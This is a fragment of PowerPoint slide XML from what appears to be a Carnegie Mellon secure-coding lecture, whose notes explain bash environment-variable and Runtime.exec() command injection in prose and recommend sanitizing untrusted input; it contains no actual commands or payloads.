      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C38757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10291880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Trust boundaries in bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: (actually undocumented feature)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bash assumes commands &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are trusted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If bash is invoked by webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> app (CGI perhaps) that happily copies form values from untrusted user into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vars</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>User can execute malicious commands in bash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Could solve by sanitizing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>b/f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> calling bash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(Or remove bash undocumented feature)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E8212886-E46C-4DA3-A5DB-E73C0AA0438E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28245860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program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> accepts an untrusted input and passes send it includes the data in input sent to a command interpreter (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</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C38757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</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Downloading a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> over ftp when Runtime.exec() runs for the first time and executing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> next time when Runtime.exec() is executed is equally bad. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C38757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</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8757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7723848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smtClean="0"/>
              <a:t>Author</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884612" y="0"/>
            <a:ext cx="2971800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45717" rIns="91435" bIns="45717"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1FEEE9EC-F0EA-4553-8CF0-BE990B99D29D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/2/2014</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38757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</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fact, this sanitization is a bit paranoid; it can invalidate legit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> names. Better safe than sorry.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C38757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</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8757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62234399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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Author</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software Engineering Institute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="0"/>
            <a:ext cx="2971800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7714C061-06BC-4B45-90DB-3968B0D850B7}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>10/2/2014</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923650" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9236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841933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 2006 Carnegie Mellon University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7570687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 2006 Carnegie Mellon University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39075303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 2006 Carnegie Mellon University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9492721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8757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6223439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8757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6223439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Transfer to Dave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{38980EEF-6EC0-43CE-94E1-43366B040A39}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26925932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
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3171" name="Picture 99"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="23288"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3200400" cy="6376988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3172" name="Picture 100"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3181350" y="304800"/>
            <a:ext cx="1600200" cy="1179513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3151" name="Rectangle 79"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="9144000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="92309" tIns="46154" rIns="92309" bIns="46154" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3084" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="3200400" y="2209800"/>
            <a:ext cx="5486400" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3144" name="Rectangle 72"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="6520820"/>
            <a:ext cx="2514600" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800" algn="r" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>© </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>2014 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Carnegie Mellon University</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3145" name="Rectangle 73"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="4740275"/>
            <a:ext cx="5486400" cy="457200"/>
          </a:xfrm>
          <a:ln w="6350"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="2463800" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3153" name="Picture 81"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect r="1515"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="6459538"/>
            <a:ext cx="4419600" cy="398462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>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7338" y="228600"/>
            <a:ext cx="2125662"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60350" y="228600"/>
            <a:ext cx="6224588"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0350" y="228600"/>
            <a:ext cx="8474075" cy="71437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4800" y="1143000"/>
            <a:ext cx="4152900" cy="5105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143000"/>
            <a:ext cx="4152900" cy="5105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260350" y="228600"/>
            <a:ext cx="8502650" cy="6019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Agenda (Architecture 2)">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513294" y="196254"/>
            <a:ext cx="7088445" cy="843028"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:defRPr sz="3800" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="1465106"/>
            <a:ext cx="3887212" cy="369332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" marR="0" indent="-274320" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="BA141A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="SegoeBook"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="SegoeBook"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="548640" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="822960" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1097280" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371600" indent="-274320">
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
